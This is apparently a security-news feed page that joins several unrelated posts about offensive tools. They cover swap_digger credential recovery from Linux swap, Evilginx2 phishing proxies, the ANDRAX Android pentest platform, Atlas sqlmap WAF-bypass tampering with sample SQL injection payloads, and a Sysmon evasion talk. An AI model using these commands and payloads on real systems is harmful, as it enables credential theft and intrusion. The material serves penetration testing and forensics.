Swap Digger – Tool That Automates Swap Extraction And Searches For Linux User Credentials, Web Forms Credentials, Web Forms Emails, Http Basic Authentication, Wifi SSID And Keys, Etc

swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.Download and run the toolOn your machineUse the following commands to download and run the script on your machine:alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.gitalice@1nvuln3r4bl3:~$ cd swap_diggeralice@1nvuln3r4bl3:~$ chmod +x swap_digger.shalice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vxOn a mounted hard driveTo use swap_digger on a mounted hard drive, do the following:First, download the script using the following commands:alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.gitalice@1nvuln3r4bl3:~$ cd swap_diggeralice@1nvuln3r4bl3:~$ chmod +x swap_digger.shThen, find the target swap file/partition with:alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -SFinally, analyze the target by running:alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx -r path/to/mounted/target/root/fs -s path/to/target/swap/deviceOn a third party machineUse the following commands to download and run the script on a third party machine (useful for pentests and CTFs):alice@1nvuln3r4bl3:~$ wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.shalice@1nvuln3r4bl3:~$ chmod +x swap_digger.shalice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vxNote: Use the -c option to automatically remove the directory created by swap_digger (/tmp/swap_dig).Simple runIf you only need to recover clear text Linux user passwords, simply run:alice@1nvuln3r4bl3:~$ sudo ./swap_digger.shAvailable optionsAll options: ./swap_digger.sh [ OPTIONS ] Options : -x, –extended Run Extended tests on the target swap to retrieve other interesting data (web passwords, emails, wifi creds, most accessed urls, etc) -g, –guessing Try to guess potential passwords based on observations and stats Warning: This option is not reliable, it may dig more passwords as well as hundreds false positives. -h, –help Display this help. -v, –verbose Verbose mode. -l, –log Log all outputs in a log file (protected inside the generated working directory). -c, –clean Automatically erase the generated working directory at end of script (will also remove log file) -r PATH, –root-path=PATH Location of the target file-system root (default value is /) Change this value for forensic analysis when target is a mounted file system. This option has to be used along the -s option to indicate path to swap device. -s PATH, –swap-path=PATH Location of swap device or swap dump to analyse Use this option for forensic/remote analysis of a swap dump or a mounted external swap partition. This option should be used with the -r option where at least //etc/shadow exists. -S, –swap-search Search for all available swap devices (use for forensics).Relevant resourcesBlog posts about swap digging:http://blog.sevagas.com/?Digging-passwords-in-Linux-swapContactFeel free to message on my Twitter account @EmericNasiDownload Swap_Digger

Link: http://feedproxy.google.com/~r/PentestTools/~3/FdfKjJxumdE/swap-digger-tool-that-automates-swap.html

Evilginx2 Man-in-the-Middle Attacks – Tradecraft Security Weekly #29

Evilginx2 is a man-in-the-middle framework that can be utilized to intercept credentials including two-factor methods victims utilize when logging in to a web application. Instead of just duplicating the target web application it proxies traffic to it making the experience seamless to the victim. In this episode Ralph May (@ralphte1) joins Beau Bullock to demo […]
The post Evilginx2 Man-in-the-Middle Attacks – Tradecraft Security Weekly #29 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/ZzWhS1W1NOM/

ANDRAX – The First And Unique Penetration Testing Platform For Android Smartphones

ANDRAX The first and unique Penetration Testing platform for Android smartphonesWhat is ANDRAXANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!Why is Android so powerful?Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones…In technical terms, ANDRAX and NetHunter should never be compared, ANDRAX is a penetration testing platform for Android smartphones and NetHunter is just a Debian emulator running with chroot.Termux is not our enemy, Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android.ANDRAX and Termux have a similar development, ANDRAX and Termux share many libs and GNU/Linux resources.But Termux is not a penetration testing platform, it’s software to bring basic tools found in a Debian environment. Penetration tests are not something basic! But advanced techniques that involve advanced tools and a advanced environment to conduct good tests!So you can install many tools manually in Termux but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing.Termux runs without root privileges and this makes it very difficult to use advanced tools. Features and ToolsTool listInformation GatheringWhoisBind DNS toolsDnsreconRaccoonDNS-CrackerFirewalkScanningNmap – Network MapperMasscanSSLScanAmapPacket CraftingHping3NpingScapyHexinjectNcatSocatNetwork HackingARPSpoofBettercapMITMProxyEvilGINX2WebSite Hacking0d1nWapiti3Recon-NGPHPSploitPhotonXSSerCommixSQLMapPayloadmaskAbernathY-XSSPassword HackingHydraNcrackJohn The RipperCRUNCHWireless HackingVMP Evil APAircrack-NG ToolsCowpattyMDK3ReaverExploitationMetaSploit FrameworkRouterSploit FrameworkGetsploitOWASP ZSCRop-TOOLMore…Advanced TerminalAdvanced and Professional terminal emulator for Hacking!Dynamic Categories Overlay (DCO)Beautiful tools category system Advanced IDEComplete support for many programming languagesInformation GatheringTools for initial informations about the targetScanningTools for second stage: ScanningPacket CraftingTools to craft network packetsNetwork HackingTools for network hackingWebSite HackingTools for WebSite and WebApps HackingPassword HackingTools to break passwordsWireless HackingTools for Wireless HackingExploitationTools for Dev and launch exploitsMore info in official site.Download ANDRAX

Link: http://feedproxy.google.com/~r/PentestTools/~3/aFUTP3UzC5o/andrax-first-and-unique-penetration.html

Atlas – Quick SQLMap Tamper Suggester

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.ScreenInstallation$ git clone https://github.com/m4ll0k/Atlas.git atlas$ cd atlas$ python atlas.pyUsage$ python atlas.py –url http://site.com/index.php?id=Price_ASC –payload=”-1234 AND 4321=4321– AAAA" –dbms=mysql –random-agent -vExampleRun SQLMap:$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3Price_ASC’) AND 8716=4837 AND (‘yajr’=’yajr is blocked by WAF/IDS/IPS, now trying with Atlas:$ python atlas.py –url ‘http://site.com/index.php?id=Price_ASC’ –payload="’) AND 8716=4837 AND (‘yajr’=’yajr" –random-agent -vAt this point:$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3 –tamper=versionedkeywords,…Download Atlas

Link: http://feedproxy.google.com/~r/PentestTools/~3/V9GwuZh2QZc/atlas-quick-sqlmap-tamper-suggester.html

Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577

Carlos Perez delivers the Technical Segment on How to Operate Offensively Against Sysmon. He talks about how SysMon allows him to create rules, and track specific types of tradecraft, around process creation and process termination. He dives into network connection, driver loading, image loading, creation of remote threats, and more! Full Show NotesVisit our website: […]
The post Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/ZcUh9FtxQUc/